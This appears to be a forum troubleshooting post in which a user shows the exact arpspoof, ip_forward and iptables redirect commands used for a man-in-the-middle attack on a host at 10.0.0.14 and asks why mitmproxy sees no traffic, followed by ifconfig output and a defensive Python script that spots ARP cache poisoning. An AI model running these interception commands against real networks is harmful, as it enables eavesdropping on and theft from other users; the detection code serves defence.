I have a target computer at 10.0.0.14 and a gateway at 10.0.0.1. I successfully insert myself as MITM by running
sudo arpspoof -i wlp3s0 -t 10.0.0.1 10.0.0.14
sudo arpspoof -i wlp3s0 -t 10.0.0.14 10.0.0.1
And when I run arp on the target computer, I see that 10.0.0.1 is associated with my MAC. On my machine, I then run
sysctl -w net.ipv4.ip_forward=1
iptables -t nat -A PREROUTING -i wlp3s0 -p tcp --dport 80 -j REDIRECT --to-port 8080
Finally, I run ping google.com on the target machine. When I run sudo tcpdump | grep 10.0.0.14 on my machine, I see many packets relating to the ping requests. But when I run mitmproxy -T --host I get nothing! What am I doing wrong?
P.S. Here is the output of ifconfig:
enp0s25 Link encap:Ethernet HWaddr [redacted]
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:20 Memory:f2500000-f2520000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:49445 errors:0 dropped:0 overruns:0 frame:0
TX packets:49445 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:4511425 (4.5 MB) TX bytes:4511425 (4.5 MB)
wlp3s0 Link encap:Ethernet HWaddr [redacted]
inet addr:10.0.0.6 Bcast:10.0.0.255 Mask:255.255.255.0
inet6 addr: 2601:280:4900:e583:a64e:31ff:fe63:ccdc/64 Scope:Global
inet6 addr: fe80::a64e:31ff:fe63:ccdc/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:502914 errors:0 dropped:0 overruns:0 frame:0
TX packets:306905 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:489697020 (489.6 MB) TX bytes:70008617 (70.0 MB)
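
From the defender's side, the symptom the post sees on the target (the gateway 10.0.0.1 resolving to another host's MAC) is the detectable trace of ARP cache poisoning. The following is an added example, not part of the original post: it assumes the Linux net-tools `arp -n` layout, and the sample table, MAC addresses and function names are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample: `arp -n` output on the affected host (Linux net-tools
# layout assumed). MAC addresses are invented; the IPs mirror the post.
SAMPLE_ARP = """\
Address                  HWtype  HWaddress           Flags Mask            Iface
10.0.0.1                 ether   02:00:00:aa:bb:06   C                     wlp3s0
10.0.0.6                 ether   02:00:00:aa:bb:06   C                     wlp3s0
10.0.0.9                 ether   02:00:00:aa:bb:09   C                     wlp3s0
10.0.0.20                        (incomplete)                              wlp3s0
"""

MAC_RE = re.compile(r"(?:[0-9a-f]{2}:){5}[0-9a-f]{2}")

def parse_arp(text):
    """Return {ip: mac} for resolved entries; header and incomplete rows are skipped."""
    table = {}
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 3 or fields[0] == "Address":
            continue
        mac = fields[2].lower()
        if MAC_RE.fullmatch(mac):
            table[fields[0]] = mac
    return table

def find_shared_macs(table):
    """Return {mac: sorted ips} for every MAC that answers for more than one IP."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}

def check_gateway(table, gateway_ip, known_gateway_mac=None):
    """Return findings for the gateway entry: MAC drift and MAC sharing."""
    mac = table.get(gateway_ip)
    if mac is None:
        return ["gateway has no resolved ARP entry"]
    findings = []
    if known_gateway_mac and mac != known_gateway_mac.lower():
        findings.append(f"gateway MAC is {mac}, expected {known_gateway_mac.lower()}")
    others = [ip for ip in find_shared_macs(table).get(mac, []) if ip != gateway_ip]
    if others:
        findings.append(f"gateway MAC {mac} is also claimed by {', '.join(others)}")
    return findings

if __name__ == "__main__":
    print(check_gateway(parse_arp(SAMPLE_ARP), "10.0.0.1", "02:00:00:aa:bb:01"))
```

A shared MAC can also be legitimate (proxy ARP, or a router holding several addresses), so the comparison against a recorded gateway MAC is the stronger of the two signals.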